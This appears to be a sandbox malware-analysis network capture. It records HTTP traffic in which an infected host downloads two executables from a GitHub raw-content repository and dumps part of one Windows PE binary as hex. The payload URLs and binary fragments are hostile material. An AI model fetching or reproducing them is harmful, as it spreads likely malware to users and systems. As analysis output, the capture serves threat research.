                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:59 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-x3zQBQJs82MOCAtC6Huepw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC124INData Raw: 37 34 37 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 75 6e 66 6f 72 67 65 74 74 61 62 6c 65 20 69 6e 74 69 6d 61 63 79 20 7a 6f 64 69 61 63 20 73 69 67 6e 73 22 2c 22 66 6f 72 74 6e 69 74 65 20 77 69 6e 74 65 72 66 65 73 74 22 2c 22 73 6f 75 74 68 20 64 61 6b 6f 74 61 20 73 74 61 74 65 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 61 6d 65 72 69 63 61 6e 20 61 69 72 6c 69 6e 65 73 20
                                                                                                                                                                                                                                                            Data Ascii: 747)]}'["",["unforgettable intimacy zodiac signs","fortnite winterfest","south dakota state football","american airlines
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 66 6c 69 67 68 74 20 66 6c 6f 6f 64 65 64 22 2c 22 61 73 74 72 61 6e 69 73 20 6d 69 63 72 6f 67 65 6f 20 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 6c 61 75 6e 63 68 22 2c 22 70 6f 6b c3 a9 6d 6f 6e 20 67 6f 20 63 6f 6d 6d 75 6e 69 74 79 20 64 61 79 20 64 65 63 65 6d 62 65 72 20 32 30 32 34 22 2c 22 67 72 65 65 6e 20 6c 61 6e 74 65 72 6e 20 67 75 79 20 67 61 72 64 6e 65 72 20 6e 61 74 68 61 6e 20 66 69 6c 6c 69 6f 6e 22 2c 22 6e 61 73 63 61 72 20 6c 61 77 73 75 69 74 20 69 6e 6a 75 6e 63 74 69 6f 6e 20 32 33 78 69 20 72 61 63 69 6e 67 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66
                                                                                                                                                                                                                                                            Data Ascii: flight flooded","astranis microgeo spacex falcon 9 launch","pokmon go community day december 2024","green lantern guy gardner nathan fillion","nascar lawsuit injunction 23xi racing"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":f
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC356INData Raw: 53 39 50 51 30 64 78 54 6c 46 43 63 48 6c 52 55 7a 4e 79 57 43 74 53 56 44 46 47 5a 32 4a 6f 64 44 51 7a 54 6d 68 6d 5a 47 49 79 4e 46 46 52 54 56 4e 47 54 6e 63 72 4d 47 77 78 4e 6e 49 30 52 6d 39 5a 51 58 59 33 54 7a 63 30 5a 44 46 79 4c 31 41 30 4b 31 68 30 4f 46 68 6c 51 32 6c 4a 4e 6a 6b 30 52 43 39 54 4d 48 42 34 55 47 68 74 4e 6e 70 45 63 45 70 4e 62 54 46 7a 4f 47 4a 44 56 57 52 35 51 56 6c 30 56 6e 49 76 56 6b 78 4d 5a 30 4a 55 55 6a 4e 59 63 6c 56 75 52 6c 6c 34 55 6e 56 35 4d 46 4a 6d 52 33 64 74 64 48 68 42 54 45 73 32 52 6b 39 70 59 32 56 4d 4e 32 77 76 54 56 64 74 5a 55 39 4f 62 55 74 34 65 69 39 56 53 56 70 4e 65 55 56 61 64 46 6c 72 64 7a 6c 47 51 30 56 59 55 6d 5a 6d 5a 31 4a 51 4e 6e 56 4d 63 44 6b 31 56 7a 52 45 56 6a 68 73 53 54 63 76
                                                                                                                                                                                                                                                            Data Ascii: S9PQ0dxTlFCcHlRUzNyWCtSVDFGZ2JodDQzTmhmZGIyNFFRTVNGTncrMGwxNnI0Rm9ZQXY3Tzc0ZDFyL1A0K1h0OFhlQ2lJNjk0RC9TMHB4UGhtNnpEcEpNbTFzOGJDVWR5QVl0VnIvVkxMZ0JUUjNYclVuRll4UnV5MFJmR3dtdHhBTEs2Rk9pY2VMN2wvTVdtZU9ObUt4ei9VSVpNeUVadFlrdzlGQ0VYUmZmZ1JQNnVMcDk1VzREVjhsSTcv
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC90INData Raw: 35 34 0d 0a 76 52 58 4e 71 55 43 39 4e 5a 30 67 34 64 45 39 6a 61 30 34 31 57 54 64 49 63 30 68 55 63 56 46 69 65 48 68 32 59 6d 52 7a 4e 6d 4a 5a 4e 6e 4e 79 5a 47 35 79 4e 48 46 49 61 56 45 72 65 6b 52 72 4e 6b 77 78 59 6c 4e 70 51 32 56 33 62 30 70 59 4e 6a 6c 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 54vRXNqUC9NZ0g4dE9ja041WTdIc0hUcVFieHh2YmRzNmJZNnNyZG5yNHFIaVErekRrNkwxYlNpQ2V3b0pYNjl
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 61 64 30 0d 0a 4e 5a 6c 70 58 5a 55 35 36 5a 6d 55 30 61 6a 4a 6a 61 45 67 33 4b 7a 5a 33 51 6d 31 48 4d 56 45 76 53 55 64 34 51 6e 4a 31 61 6a 46 59 4d 6b 4a 55 65 44 64 7a 62 32 34 78 65 69 38 35 53 56 6c 42 4e 47 34 72 64 54 45 35 52 6e 42 6d 53 6a 63 7a 62 30 56 74 53 33 46 4c 52 55 46 56 63 45 6c 76 57 69 39 54 65 56 70 6b 59 32 5a 76 4e 44 68 6e 53 55 49 76 5a 44 4e 53 4c 7a 6c 51 62 47 31 4a 56 6e 6f 34 56 32 64 31 61 56 67 34 4c 7a 46 56 4d 56 52 46 64 54 5a 54 62 48 4e 4d 57 6b 45 32 65 45 4a 49 4d 30 52 51 4e 48 6c 30 4d 55 56 75 54 6d 63 35 4d 32 67 77 62 47 39 71 65 6b 39 47 62 55 74 55 53 6a 4a 6e 65 6e 46 69 57 56 4e 6c 53 6e 49 79 65 44 56 51 4e 55 5a 73 56 47 31 59 4f 44 56 6e 61 79 39 33 55 7a 56 70 65 6b 6c 54 55 6e 68 6e 56 54 4a 73 56
                                                                                                                                                                                                                                                            Data Ascii: ad0NZlpXZU56ZmU0ajJjaEg3KzZ3Qm1HMVEvSUd4QnJ1ajFYMkJUeDdzb24xei85SVlBNG4rdTE5RnBmSjczb0VtS3FLRUFVcElvWi9TeVpkY2ZvNDhnSUIvZDNSLzlQbG1JVno4V2d1aVg4LzFVMVRFdTZTbHNMWkE2eEJIM0RQNHl0MUVuTmc5M2gwbG9qek9GbUtUSjJnenFiWVNlSnIyeDVQNUZsVG1YODVnay93UzVpeklTUnhnVTJsV
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1385INData Raw: 53 6d 4a 6e 53 47 38 33 53 54 52 52 53 32 52 58 64 55 5a 52 64 55 51 34 53 31 64 4f 59 6d 6b 31 53 31 4a 68 54 45 35 4e 52 56 45 35 53 55 31 4c 54 57 56 4b 53 31 64 5a 52 54 6c 4e 53 56 4e 6a 63 47 39 33 62 6b 68 55 51 58 55 72 55 54 68 49 55 55 35 50 56 56 52 7a 4e 45 4e 54 63 47 68 55 52 6b 45 79 4d 44 64 49 62 6b 35 59 4f 56 51 34 54 6a 64 6c 55 53 38 79 61 6b 74 72 53 47 78 56 56 6b 4d 72 51 6b 56 71 59 30 4e 4f 61 6b 56 44 52 6e 42 6d 63 6e 70 46 4b 31 56 46 61 48 6f 30 53 69 74 4f 53 6b 64 4a 4e 44 46 56 54 30 70 30 59 6d 46 6f 4d 45 35 4c 4d 45 68 79 54 45 68 54 64 57 67 32 51 7a 52 58 56 47 74 4d 4d 54 42 53 61 6e 64 52 55 6c 4a 4e 51 6e 4a 4f 61 57 6c 50 62 46 52 45 64 44 64 7a 65 47 5a 6e 61 45 56 7a 5a 33 56 72 57 56 5a 7a 57 6d 64 52 64 47 6c
                                                                                                                                                                                                                                                            Data Ascii: SmJnSG83STRRS2RXdUZRdUQ4S1dOYmk1S1JhTE5NRVE5SU1LTWVKS1dZRTlNSVNjcG93bkhUQXUrUThIUU5PVVRzNENTcGhURkEyMDdIbk5YOVQ4TjdlUS8yaktrSGxVVkMrQkVqY0NOakVDRnBmcnpFK1VFaHo0SitOSkdJNDFVT0p0YmFoME5LMEhyTEhTdWg2QzRXVGtMMTBSandRUlJNQnJOaWlPbFREdDdzeGZnaEVzZ3VrWVZzWmdRdGl
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            94192.168.2.450129185.199.110.133443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC122OUTGET /Urijas/moperats/refs/heads/main/ktyihkdfesf.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC901INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 147968
                                                                                                                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            ETag: "3e9c4b1e9cdeb98d530cbedabe09c3091bd9f712d1fef28624dd688e9d17d2e1"
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-GitHub-Request-Id: 8564:39A855:73444B:82B7FA:6767303E
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:59 GMT
                                                                                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                                                                                            X-Served-By: cache-ewr-kewr1740055-EWR
                                                                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                                                                                                                            X-Timer: S1734816000.821874,VS0,VE1
                                                                                                                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                            X-Fastly-Request-ID: 328aaad9cada6793acb3a38aba8e1742ad3c1601
                                                                                                                                                                                                                                                            Expires: Sat, 21 Dec 2024 21:24:59 GMT
                                                                                                                                                                                                                                                            Source-Age: 193
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 a3 98 61 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 de 01 00 00 60 00 00 00 00 00 00 c0 85 01 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 23 00 00 04 00 00 00 00 00 00 02 00 00 82 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 17 02 00 c8 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELag`@#(
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1378INData Raw: ff 15 98 19 42 00 cc cc cc cc cc cc cc cc 55 89 e5 50 c7 45 fc 00 00 00 00 64 a1 30 00 00 00 51 8b 48 02 89 4d fc 59 83 c4 04 5d c3 cc cc 31 c0 64 f7 05 30 00 00 00 68 00 00 00 0f 95 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 74 24 14 64 a1 30 00 00 00 8b 78 0c 83 c7 14 8b 2d 20 1a 42 00 89 fb 0f 1f 40 00 8b 1b 39 fb 74 0a 56 ff 73 28 ff d5 85 c0 75 f0 39 fb 0f 95 c0 5e 5f 5b 5d c2 04 00 cc cc cc cc 53 57 56 64 a1 30 00 00 00 8b 78 0c 83 c7 14 8b 35 20 1a 42 00 89 fb 66 0f 1f 84 00 00 00 00 00 8b 1b 39 fb 74 13 68 2a 15 42 00 ff 73 28 ff d6 85 c0 75 ec e9 2f 01 00 00 64 a1 30 00 00 00 8b 78 0c 83 c7 14 89 fb 66 0f 1f 84 00 00 00 00 00 8b 1b 39 fb 74 13 68 d4 15 42 00 ff 73 28 ff d6 85 c0 75 ec e9 ff 00 00 00 64 a1 30 00 00 00 8b 78
                                                                                                                                                                                                                                                            Data Ascii: BUPEd0QHMY]1d0hUSWVt$d0x- B@9tVs(u9^_[]SWVd0x5 Bf9th*Bs(u/d0xf9thBs(ud0x
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1378INData Raw: e8 67 eb 00 00 8b 3d fc 4f 63 00 8d 75 c4 89 f1 e8 57 ee 00 00 50 ff d7 89 f1 e8 fd ed 00 00 8d 7d dc 89 f9 e8 f3 ed 00 00 89 f1 e8 3c eb 00 00 89 f9 e8 35 eb 00 00 8d 5d 08 8d 4b 2c e8 2a eb 00 00 8d 4b 18 e8 22 eb 00 00 8d 4b 0c e8 1a eb 00 00 89 d9 e8 13 eb 00 00 8d 65 f4 5e 5f 5b 5d c2 68 00 cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 48 03 00 00 8d 5d 08 8d 4d 94 68 0a 15 42 00 e8 74 ea 00 00 8d 8d 6c ff ff ff 68 0a 15 42 00 e8 64 ea 00 00 8b 85 98 00 00 00 83 f8 02 74 13 83 f8 01 74 18 85 c0 75 4d 8d b5 ec fd ff ff 6a 1c eb 12 8d b5 ec fd ff ff 6a 28 eb 08 8d b5 ec fd ff ff 6a 1a 56 e8 be fd 00 00 8d bd ac fc ff ff 8d 5d 94 89 d9 56 57 e8 3c eb 00 00 89 d9 57 e8 e4 ea 00 00 89 f9 e8 7d ea 00 00 89 f1 8d 5d 08 e8 73 ea 00 00 8d 75 20 83 7b 24
                                                                                                                                                                                                                                                            Data Ascii: g=OcuWP}<5]K,*K"Ke^_[]hUSWVH]MhBtlhBdttuMjj(jV]VW<W}]su {$
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1378INData Raw: 00 00 89 f9 e8 01 e6 00 00 8d 85 ec fd ff ff 50 ff 75 ec ff 15 00 50 63 00 85 c0 8d 5d c8 0f 84 b6 fc ff ff 89 d9 68 be 0b 42 00 56 e8 e9 e6 00 00 89 f1 8d 85 18 fe ff ff 50 8d 7d e0 57 e8 d7 e6 00 00 8d 5d a0 89 d9 57 e8 1c e6 00 00 89 f9 e8 b5 e5 00 00 89 f1 e8 ae e5 00 00 89 e6 83 ec 0c 89 e1 53 e8 71 e5 00 00 e8 8c f8 00 00 89 f4 8d 75 d4 85 c0 74 92 89 f9 68 0a 15 42 00 e8 17 e5 00 00 89 f9 68 f9 00 42 00 8d bd 60 ff ff ff 57 e8 84 e6 00 00 89 f9 68 be 0b 42 00 8d bd 78 ff ff ff 57 e8 71 e6 00 00 89 f9 8d 45 14 50 8d 5d b8 53 e8 02 e6 00 00 89 d9 68 be 0b 42 00 56 e8 55 e6 00 00 8d 7d e0 89 f9 56 e8 9a e5 00 00 89 f1 e8 33 e5 00 00 89 d9 e8 2c e5 00 00 8d 8d 78 ff ff ff e8 21 e5 00 00 8d 8d 60 ff ff ff e8 16 e5 00 00 89 f9 8d 85 18 fe ff ff 50 56 e8
                                                                                                                                                                                                                                                            Data Ascii: PuPc]hBVP}W]WSquthBhB`WhBxWqEP]ShBVU}V3,x!`PV
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1378INData Raw: 7d c8 89 f9 e8 9f e3 00 00 50 ff d6 89 f9 e8 45 e3 00 00 8d b5 ec fd ff ff 89 f1 e8 38 e3 00 00 6a 04 8d 45 e0 50 e8 9d f0 00 00 89 f9 e8 76 e0 00 00 89 f1 e9 4a f7 ff ff ff 75 90 ff 15 08 50 63 00 8d 4d 94 e8 0e e3 00 00 8d 8d 6c ff ff ff e8 03 e3 00 00 eb 13 8d 4d c8 e8 49 e0 00 00 8d 4d a0 e8 41 e0 00 00 8d 75 08 8d 8d 6c ff ff ff e8 33 e0 00 00 8d 4d 94 e8 2b e0 00 00 89 f1 e8 24 e0 00 00 8d 4d 14 e8 1c e0 00 00 8d 4d 20 e8 14 e0 00 00 8d 4e 54 e8 0c e0 00 00 8d 4e 40 e8 04 e0 00 00 83 c6 34 89 f1 e8 fa df 00 00 8d 4d 30 e8 f2 df 00 00 8d 65 f4 5e 5f 5b 5d c2 94 00 e8 ad ca 01 00 cc cc cc 55 89 e5 53 57 56 83 ec 1c 83 bd 80 00 00 00 00 0f 84 fd 00 00 00 8d 45 08 8d 48 0c 89 4d d8 8d 48 18 89 4d dc 8d 48 2c 89 4d e0 83 c0 38 89 45 e4 31 f6 31 db 66 66
                                                                                                                                                                                                                                                            Data Ascii: }PE8jEPvJuPcMlMIMAul3M+$MM NTN@4M0e^_[]USWVEHMHMH,M8E11ff
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1378INData Raw: 50 08 c7 02 01 00 00 00 89 15 dc 46 42 00 83 c0 10 eb 02 31 c0 5e 5f c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 44 24 08 85 c0 74 6a 8d 48 f0 c7 40 f0 01 00 00 00 8b 50 f8 85 d2 74 29 83 3a 00 74 24 39 15 dc 46 42 00 75 06 89 0d dc 46 42 00 8b 72 04 01 70 f4 8b 72 08 89 70 f8 8b 52 08 85 d2 74 03 89 4a 0c 8b 50 fc 85 d2 74 29 83 3a 00 74 24 39 0d dc 46 42 00 75 06 89 15 dc 46 42 00 8b 48 f4 01 4a 04 8b 48 f8 89 4a 08 8b 40 f8 85 c0 74 03 89 50 0c 5e c2 04 00 cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 5c 24 14 c6 03 00 c6 43 01 00 c6 43 02 00 c6 43 03 00 c6 43 04 00 c6 43 05 00 c6 43 06 00 c6 43 07 00 c6 43 08 00 c6 43 09 00 c6 43 0a 00 c6 43 0b 00 c6 43 0c 00 c6 43 0d 00 c6 43 0e 00 c6 43 0f 00 c6 43 10 00 c6 43 11 00 c6 43 12 00 c6 43 13 00 c6 43
                                                                                                                                                                                                                                                            Data Ascii: PFB1^_VD$tjH@Pt):t$9FBuFBrprpRtJPt):t$9FBuFBHJHJ@tP^USWV\$CCCCCCCCCCCCCCCCCCCC
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1378INData Raw: 4d d8 8d 7d a8 e8 da d5 00 00 0f b7 85 60 ff ff ff 8b 8d 58 ff ff ff 83 ec 20 0f 28 05 c0 f0 41 00 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 89 34 24 c7 44 24 1c 00 00 00 00 ff 15 48 51 63 00 8b 4d ec 85 c0 0f 84 6c 03 00 00 89 c6 89 5d c4 31 c0 85 c9 0f 94 c0 c1 e0 17 0d 00 01 40 00 6a 00 50 6a 00 6a 00 68 53 10 42 00 ff b5 74 ff ff ff 68 f2 0b 42 00 56 89 cb ff 15 58 51 63 00 89 45 f0 85 c0 0f 84 23 03 00 00 89 75 c8 85 db 8d b5 78 f7 ff ff 75 18 c7 85 78 f7 ff ff ff ff ff ff 6a 04 56 6a 1f ff 75 f0 ff 15 68 51 63 00 8d 7d 90 89 f9 68 73 11 42 00 56 e8 36 d6 00 00 89 f9 56 e8 7e d5 00 00 89 f1 e8 17 d5 00 00 89 f9 8d 5d cc 53 56 e8 bb d5 00 00 89 f9 56 e8 63 d5 00 00 89 f1 e8 fc d4 00 00 89 f9 68 05 15 42 00 56 e8 ff d5 00 00 89 f9 56 e8 47 d5 00 00 89 f1
                                                                                                                                                                                                                                                            Data Ascii: M}`X (AD$D$L$4$D$HQcMl]1@jPjjhSBthBVXQcE#uxuxjVjuhQc}hsBV6V~]SVVchBVVG
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC1378INData Raw: fe ff ff 6a 14 56 e8 f7 e1 00 00 8d 9d 6c f6 ff ff 89 f9 56 53 e8 18 d1 00 00 89 f9 53 e8 c0 d0 00 00 89 d9 e8 59 d0 00 00 89 f1 e8 52 d0 00 00 8d bd 78 ff ff ff 8d 4d c8 68 71 11 42 00 57 e8 4e d1 00 00 89 f9 8d 45 a0 50 56 e8 e2 d0 00 00 89 f1 68 dd 14 42 00 53 e8 35 d1 00 00 8d 4d c8 53 e8 7c d0 00 00 89 d9 e8 15 d0 00 00 89 f1 e8 0e d0 00 00 89 f9 e8 07 d0 00 00 8d 7d 90 89 f9 68 40 11 42 00 56 e8 07 d1 00 00 89 f1 8d 45 a0 50 53 e8 9b d0 00 00 89 f9 53 e8 43 d0 00 00 89 d9 8d 5d 08 e8 d9 cf 00 00 89 f1 e8 d2 cf 00 00 0f b7 85 54 ff ff ff 8b 8d 4c ff ff ff 8b 53 04 83 ec 20 0f 28 05 c0 f0 41 00 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 89 14 24 c7 44 24 1c 00 00 00 00 ff 15 48 51 63 00 85 c0 0f 84 ce 05 00 00 89 c6 31 c0 8b 7d ec 85 ff 0f 94 c0 c1 e0 17
                                                                                                                                                                                                                                                            Data Ascii: jVlVSSYRxMhqBWNEPVhBS5MS|}h@BVEPSSC]TLS (AD$D$L$$D$HQc1}
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC1378INData Raw: 31 f6 8b 45 e8 89 45 b4 0f 1f 84 00 00 00 00 00 a1 54 51 63 00 89 45 ec 8b 3d 2c 50 63 00 8d 5d 90 89 d9 e8 f8 cd 00 00 50 ff d7 89 c7 89 d9 e8 ec cd 00 00 ff 75 b0 ff 75 b4 57 50 ff 75 f0 ff 55 ec 85 c0 75 2a 89 c7 68 b8 0b 00 00 ff 15 fc 19 42 00 81 fe 7d 96 98 00 77 05 46 85 ff 74 b0 8d 45 e8 6a 04 50 e8 d5 da 00 00 e9 30 01 00 00 8d 45 e8 6a 04 50 e8 c5 da 00 00 c7 45 ac 00 01 00 00 8d 45 ac 6a 00 50 8d b5 3c fe ff ff 56 6a 13 ff 75 f0 ff 15 64 51 63 00 85 c0 0f 84 fe 00 00 00 56 e8 68 da 00 00 3d c8 00 00 00 0f 85 ed 00 00 00 8d 45 dc 50 68 cf 07 00 00 8d 9d 6c f6 ff ff 53 ff 75 f0 ff 15 5c 51 63 00 85 c0 74 54 8b 45 dc 85 c0 74 4d 8d 75 84 66 0f 1f 44 00 00 c6 84 05 6c f6 ff ff 00 89 f1 53 8d bd 78 ff ff ff 57 e8 39 cb 00 00 89 f1 57 e8 81 ca 00 00
                                                                                                                                                                                                                                                            Data Ascii: 1EETQcE=,Pc]PuuWPuUu*hB}wFtEjP0EjPEEjP<VjudQcVh=EPhlSu\QctTEtMufDlSxW9W
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC1378INData Raw: 89 f1 57 e8 16 c6 00 00 89 f9 e8 af c5 00 00 89 f1 8d 45 b8 50 57 e8 53 c6 00 00 89 f1 57 e8 fb c5 00 00 89 f9 e8 94 c5 00 00 89 f1 68 05 15 42 00 57 e8 97 c6 00 00 89 f1 57 e8 df c5 00 00 89 f9 e8 78 c5 00 00 89 f1 68 09 13 42 00 57 e8 7b c6 00 00 89 f1 57 e8 c3 c5 00 00 89 f9 e8 5c c5 00 00 89 f1 68 8c 09 42 00 57 e8 5f c6 00 00 89 f1 57 e8 a7 c5 00 00 89 f9 e8 40 c5 00 00 89 f1 68 02 15 42 00 57 e8 43 c6 00 00 89 f1 57 e8 8b c5 00 00 89 f9 e8 24 c5 00 00 e8 7f d6 ff ff 89 f1 50 57 e8 26 c6 00 00 89 f1 57 e8 6e c5 00 00 89 f9 e8 07 c5 00 00 89 f1 68 05 15 42 00 57 e8 0a c6 00 00 89 f1 57 e8 52 c5 00 00 89 f9 e8 eb c4 00 00 89 f1 68 73 11 42 00 57 e8 ee c5 00 00 89 f1 57 e8 36 c5 00 00 89 f9 e8 cf c4 00 00 89 f1 8d 45 b8 50 57 e8 73 c5 00 00 89 f1 57 e8
                                                                                                                                                                                                                                                            Data Ascii: WEPWSWhBWWxhBW{W\hBW_W@hBWCW$PW&WnhBWWRhsBWW6EPWsW


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            95192.168.2.450130185.199.110.133443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC122OUTGET /Urijas/moperats/refs/heads/main/biyjdfjadaw.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC903INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 1058336
                                                                                                                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            ETag: "02fab045ea6ba15dc6f39ffbdce0ff0b102325b06457bc1e31975f96b1a69b43"
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-GitHub-Request-Id: 32B3:2760AB:783E5C:87BBC8:676730FF
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:20:00 GMT
                                                                                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                                                                                            X-Served-By: cache-ewr-kewr1740024-EWR
                                                                                                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                                                                                                                            X-Timer: S1734816000.998231,VS0,VE115
                                                                                                                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                            X-Fastly-Request-ID: 98aa6e7cc620d2616ee98fb29cbef3e38e9500ec
                                                                                                                                                                                                                                                            Expires: Sat, 21 Dec 2024 21:25:00 GMT
                                                                                                                                                                                                                                                            Source-Age: 0
